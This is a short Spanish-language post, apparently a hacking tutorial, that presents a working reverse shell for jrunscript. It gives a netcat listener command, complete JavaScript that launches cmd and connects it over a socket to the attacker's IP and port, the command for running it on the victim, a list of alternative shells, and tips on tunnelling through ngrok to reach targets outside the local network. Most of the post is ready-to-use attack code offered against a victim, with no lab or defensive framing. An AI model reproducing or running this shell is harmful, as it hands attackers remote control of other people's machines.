hola a qui les presento una shell inversa en jrunscript

 





paso a explicar los comandos mas importantes recuerda el atacante y la victima tienen que usar el mismo puerto y estar dentro de la misma red si quieres atraves de wan tienes que usar un tunel XD

1 primer paso preparando el listener en el atacante en el puerto 9001
 

 

nc -lvnp 9001

2 modifica la primera linea del script para que use el ip del atacante y un puerto recuerda los puertos tienen que coincidir

 

main( "localhost",9001,"cmd");
 
function main(host,port,cmd) {
	try {
		p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();
		s = new java.net.Socket(host, port);
		pi = p.getInputStream();
		pe = p.getErrorStream();
		si = s.getInputStream();
		po = p.getOutputStream();
		so = s.getOutputStream();
		while (!s.isClosed()) {
			while (pi.available() > 0)
				so.write(pi.read());
			while (pe.available() > 0)
				so.write(pe.read());
			while (si.available() > 0)
				po.write(si.read());
			so.flush();
			po.flush();
			java.lang.Thread.sleep(50);
			try {
				p.exitValue();
				break;
			} catch ( e) {/*e.printStackTrace();*/}
		}
		p.destroy();
		s.close();
	} catch ( e) {e.printStackTrace();}
}
 
 
 

3 ejecutar script shell.js en la victima usando el ip del atacante y cmd para los que odian al los pinwinos o

jrunscript shell.js

otras opciones dependiendo de el sistema operativo y las configuraciones puede funcionar alguno
 sh
 /bin/sh
 bash
 /bin/bash
 cmd
 powershell
 pwsh
 ash
 bsh
 csh
 ksh
 zsh
 pdksh
 tcsh


fuentes y herramientas

un builder de shell reversa online https://www.revshells.com/

y con ngrok te haces un tunel